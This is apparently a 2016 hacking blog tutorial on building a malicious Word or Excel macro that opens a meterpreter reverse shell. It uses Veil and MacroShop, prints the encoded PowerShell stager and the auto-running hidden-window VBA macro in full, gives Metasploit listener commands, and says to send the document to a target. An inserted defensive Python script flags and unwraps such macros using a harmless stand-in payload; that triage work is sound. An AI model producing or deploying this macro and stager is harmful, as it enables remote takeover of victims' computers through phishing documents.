Hello guys,
Today the 3rd part of the series. Today we are going to use 2 tools!
The first tool is Veil, and you can install it in Kali with: apt-get install veil-evasion (it's really large and a really long installation).
The 2nd tool is MacroShop. Git clone it with: git clone https://github.com/khr0x40sh/MacroShop.git
Open up Veil by running veil-evasion.
If you want to see all the available payloads use: list
The payload we want is number 22... powershell/meterpreter/rev_tcp
Select it with the command: use 22
and then set the LHOST and the LPORT: LHOST=192.168.x.x, LPORT=443, generatename=doesntreallymatter.
You will get this output:
Language: powershell
Payload: powershell/meterpreter/rev_tcp
Required Options: LHOST=192.168.1.22 LPORT=443
Payload File: /var/lib/veil-evasion/output/source/hi.bat
Handler File: /var/lib/veil-evasion/output/handlers/hi_handler.rc
Then type exit to leave Veil.
Go to the payload file and open it with leafpad (or whatever editor you want):
leafpad /var/lib/veil-evasion/output/source/hi.bat
Your payload file will look like this (the Base64 blob was broken across lines on the page and is rejoined here; the file ends where the original post cuts off):
@echo off
if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVPbbtswDH33VxCGgdqIbTiXFl2KAr0hW4EtK5piewjy4Chso1WWDIlO4nb599Gts61FNwzzy5El8pwjkgoEHMOJ700vlLosSmMp9O/RalT9XrpQyo9mUFZzJQU4yokBN8TncKnpiix8kZaqXJ0qZUTY7q1jqKQm2LRYt/gQHf23zrnFnPBmybDY6VQt7yqGX8rt6jftdqdR9088svVj4PjSY1wnn+ffUBBMakdYpGOkdGLEPZJrEcLpG2eni4VF50Z5IVU9Gw5ZAC0HrI29j+GtjGe8qUvk8AnxJYq3A6+sISOMakNvRBl5gUvPjdZsNNzrvuul3YPDtJv2ensxDPiL4DuYihJdKXUEQclXm55amzfOnqt2qbmkWmDoz2tCn9MiDtxwIFNfo0C5wjAoXxE98HnmBfU/8E3PJLHFFVouRGPbcEn6PeaMs6iz36jV02zWEG7ORt56KRVCyAqJor8nR/DYOOm8tFrHwUNnP+734j8Xe6TyO8d0Y6Mxgq13ayxLyuMum5EsjDBoVp0OS7C7QDb2dnSvLL1HOuObunDKIzVjJx9yvVAYcVbSnW29gDiXpyJp2gZJgcUc7QXeSi1JGg2BgGScFwj+V6n7PR8SzX+uzAXC086o0qKJdJCUuXO0tFXToeOAhsMXLyyLgzr9iPqOlnG26WdZxjDIIm/n/LrSJAtMn2bSlBO0KynQpZ9y65a5anpoyropIWTcuOe3MQuDTbqrexTF8FOEp492bW8fHyvGwSZuIHs5MhPKLSUThVhCMkFh9AIODwZZthU5ieXj9gc=\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader
As you can see, this file is not written in Visual Basic (.vbs) but in PowerShell, so we can't use this code directly in a macro. This is where we need MacroShop. The script in MacroShop is called macro_safe.py. Move to the folder we git cloned MacroShop into with cd MacroShop and run the script with Python:
python macro_safe.py /var/lib/veil-evasion/output/source/hi.bat doesntreallymater.txt
Well done, our PowerShell code is now translated to Visual Basic :)
The output is something like this:
Sub Workbook_Open()
'VBA arch detect suggested by "T"
Dim Command As String
Dim str As String
Dim exec As String
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
Command = "powershell.exe"
End If
str = "nVPbbtswDH33VxCGgdqIbTiXFl2KAr0hW4EtK5piewjy4Chso1WWDI"
str = str + "lO4nb599Gts61FNwzzy5El8pwjkgoEHMOJ700vlLosSmMp9O"
str = str + "/RalT9XrpQyo9mUFZzJQU4yokBN8TncKnpiix8kZaqXJ0qZU"
str = str + "TY7q1jqKQm2LRYt/gQHf23zrnFnPBmybDY6VQt7yqGX8rt6j"
str = str + "ftdqdR9088svVj4PjSY1wnn+ffUBBMakdYpGOkdGLEPZJrEc"
str = str + "LpG2eni4VF50Z5IVU9Gw5ZAC0HrI29j+GtjGe8qUvk8AnxJY"
str = str + "q3A6+sISOMakNvRBl5gUvPjdZsNNzrvuul3YPDtJv2ensxDP"
str = str + "iL4DuYihJdKXUEQclXm55amzfOnqt2qbmkWmDoz2tCn9MiDt"
str = str + "xwIFNfo0C5wjAoXxE98HnmBfU/8E3PJLHFFVouRGPbcEn6Pe"
str = str + "aMs6iz36jV02zWEG7ORt56KRVCyAqJor8nR/DYOOm8tFrHwU"
str = str + "NnP+734j8Xe6TyO8d0Y6Mxgq13ayxLyuMum5EsjDBoVp0OS7"
str = str + "C7QDb2dnSvLL1HOuObunDKIzVjJx9yvVAYcVbSnW29gDiXpy"
str = str + "Jp2gZJgcUc7QXeSi1JGg2BgGScFwj+V6n7PR8SzX+uzAXC08"
str = str + "6o0qKJdJCUuXO0tFXToeOAhsMXLyyLgzr9iPqOlnG26WdZxj"
str = str + "DIIm/n/LrSJAtMn2bSlBO0KynQpZ9y65a5anpoyropIWTcuO"
str = str + "e3MQuDTbqrexTF8FOEp492bW8fHyvGwSZuIHs5MhPKLSUThV"
str = str + "hCMkFh9AIODwZZthU5ieXj9gc="
exec = Command + " -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRea"
exec = exec + "der ($(New-Object IO.Compression.DeflateStream ("
exec = exec + "$(New-Object IO.MemoryStream (,$([Convert]::From"
exec = exec + "Base64String(\"" " & str & " \"" )))), [IO.Compr"
exec = exec + "ession.CompressionMode]::Decompress)), [Text.Enc"
exec = exec + "oding]::ASCII)).ReadToEnd();"""
Shell exec,vbHide
End Sub
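From the defender's side, the macro above has a fixed shape: a long string rebuilt from `str = str + "..."` lines, a powershell.exe launcher with `-NoP -NonI -W Hidden -Exec Bypass`, a Base64 plus Deflate wrapper around the real command, and a hidden `Shell exec,vbHide` call. The same flags appear in the .bat file from Veil. The Python below is an added example for triaging such a macro; it is not from this post, from Veil or from MacroShop. It replays the VBA string assignments to reassemble the command line (so keywords MacroShop splits across literals, like `From` + `Base64String`, become visible again), flags the indicators, and unwraps the Base64/Deflate layer to recover the inner PowerShell. The macro it runs on is constructed in the script itself, with a harmless `Write-Output` command in place of the stager; the indicator names and the `triage_macro` API are this example's own.

```python
import base64
import re
import zlib
from typing import Dict, List, Optional

# Indicators that characterise the launcher shown above. Each is checked against
# the raw VBA text and the reassembled command line, because MacroShop splits
# keywords such as FromBase64String across several string literals.
INDICATORS = [
    ("powershell launcher", re.compile(r"powershell\.exe", re.I)),
    ("hidden window (-W Hidden)", re.compile(r"-W\s+Hidden", re.I)),
    ("execution policy bypass", re.compile(r"-Exec\s+Bypass", re.I)),
    ("no profile, non-interactive", re.compile(r"-NoP\b.*-NonI\b", re.I | re.S)),
    ("base64 payload", re.compile(r"FromBase64String", re.I)),
    ("deflate-compressed payload", re.compile(r"DeflateStream", re.I)),
    ("Invoke-Expression", re.compile(r"Invoke-Expression", re.I)),
    ("hidden Shell() call", re.compile(r"\bShell\b.*vbHide", re.I)),
    ("SysWOW64 32-bit redirection", re.compile(r"syswow64", re.I)),
]

# VBA concatenation tokens: "literal" (with "" as an escaped quote), identifier, + or &.
_TOKEN = re.compile(r'"((?:[^"]|"")*)"|(\w+)|([+&])|\s+')
_ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")


def _eval_concat(expr: str, values: Dict[str, str]) -> Optional[str]:
    """Evaluate a pure string-concatenation expression; None if it is anything else."""
    parts: List[str] = []
    pos = 0
    while pos < len(expr):
        m = _TOKEN.match(expr, pos)
        if not m:
            return None          # function call, number, ...: not a plain concatenation
        pos = m.end()
        if m.group(1) is not None:
            parts.append(m.group(1).replace('""', '"'))
        elif m.group(2):
            if m.group(2) not in values:
                return None      # unknown identifier, e.g. an Environ() result
            parts.append(values[m.group(2)])
    return "".join(parts)


def reassemble_strings(vba: str) -> Dict[str, str]:
    """Replay `v = "..."`, `v = v + "..."` and `v = a & b` assignments in order.
    Control flow is ignored (the last assignment wins); that is enough for triage
    because both branches of the macro feed the same launcher string."""
    values: Dict[str, str] = {}
    for line in vba.splitlines():
        m = _ASSIGN.match(line)
        if m:
            result = _eval_concat(m.group(2), values)
            if result is not None:
                values[m.group(1)] = result
    return values


def unwrap_payload(command_line: str) -> Optional[str]:
    """Undo the [Convert]::FromBase64String + DeflateStream wrapper, if present."""
    m = re.search(r'FromBase64String\(\\?"\s*([A-Za-z0-9+/=]+)\s*\\?"', command_line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return zlib.decompress(raw, -15).decode("ascii", errors="replace")  # -15: raw Deflate
    except (ValueError, zlib.error):
        return None


def triage_macro(vba: str) -> dict:
    """Report indicators, the reassembled command line and the unwrapped inner command."""
    launcher = reassemble_strings(vba).get("exec", "")
    hits = [label for label, rx in INDICATORS if rx.search(vba) or rx.search(launcher)]
    return {"launcher": launcher, "indicators": hits,
            "inner_command": unwrap_payload(launcher), "suspicious": len(hits) >= 4}


def build_sample_macro(inner_command: str) -> str:
    """Constructed test fixture (not taken from the post): a macro of the shape shown
    above, carrying `inner_command` in place of a stager."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)   # raw Deflate, as DeflateStream expects
    blob = base64.b64encode(comp.compress(inner_command.encode("ascii")) + comp.flush()).decode("ascii")
    chunks = [blob[i:i + 48] for i in range(0, len(blob), 48)]
    lines = [
        "Sub Workbook_Open()", "Dim Command As String", "Dim str As String", "Dim exec As String",
        'Arch = Environ("PROCESSOR_ARCHITECTURE")', 'windir = Environ("windir")',
        'If Arch = "AMD64" Then',
        'Command = windir + "\\syswow64\\windowspowershell\\v1.0\\powershell.exe"',
        "Else", 'Command = "powershell.exe"', "End If",
        f'str = "{chunks[0]}"', *[f'str = str + "{c}"' for c in chunks[1:]],
        'exec = Command + " -NoP -NonI -W Hidden -Exec Bypass -Command ""Invoke-Expression $(New-Object IO.StreamReader "',
        'exec = exec + "($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::From"',
        'exec = exec + "Base64String(\\"" " & str & " \\"" )))), [IO.Compression.CompressionMode]::Decompress)), "',
        'exec = exec + "[Text.Encoding]::ASCII)).ReadToEnd();"""',
        "Shell exec,vbHide", "End Sub",
    ]
    return "\n".join(lines)


BENIGN_COMMAND = "Write-Output 'constructed benign sample'"   # stands in for the stager
SAMPLE_MACRO = build_sample_macro(BENIGN_COMMAND)

if __name__ == "__main__":
    for key, value in triage_macro(SAMPLE_MACRO).items():
        print(f"{key}: {value}")
```

The raw VBA alone never contains the token `FromBase64String`, so a grep for it misses this macro; only the reassembled launcher exposes it. That is the reason the script replays the assignments before matching, and the same approach applies to the generated .bat file, whose command line is already in one piece.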
Go to Metasploit and run these commands:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.x.x
set LPORT 443
exploit
Then switch to a Windows box and open Microsoft Word or Microsoft Excel. Go to the 'View' tab, select the Macros button
and then View Macros.
Add a new macro (just give it the name you want) and press Create.
(You can do all these steps in one: just hit Alt+F11.)
Remove the things your document creates by default and paste the generated macro code into the editor. Then close the macro editor and do one of the most important steps of this tutorial! Save the file as WhateverYouWant.docm (Macro-Enabled Document) or WhateverYouWant.doc (must be a Word 97-2003 Document!).
Press save and send your file to your target. Switch back to the system you're running your Metasploit listener on.
Okay, that was the 3rd method to pwn a box with macros.
See ya later guys
Bye :)
@ClaimItToYou
Hey guys, what's up. This is a short message from @claimittoyou...
As you may know I've stopped the Funny Friday series... Well, stop crying, dry your tears, especially for you I will start a new hacking series. The title of the new series is: Microsoft's meterpreter macros. The reason why I've chosen this title is because in this series we're going to inject Microsoft Office files (Word, Excel, maybe PowerPoint) with malicious .vbs macros with various tools to directly execute shellcode on our targets (FUD). That was it for now, see ya later guys :) @ClaimItToYou
Archives: March 2016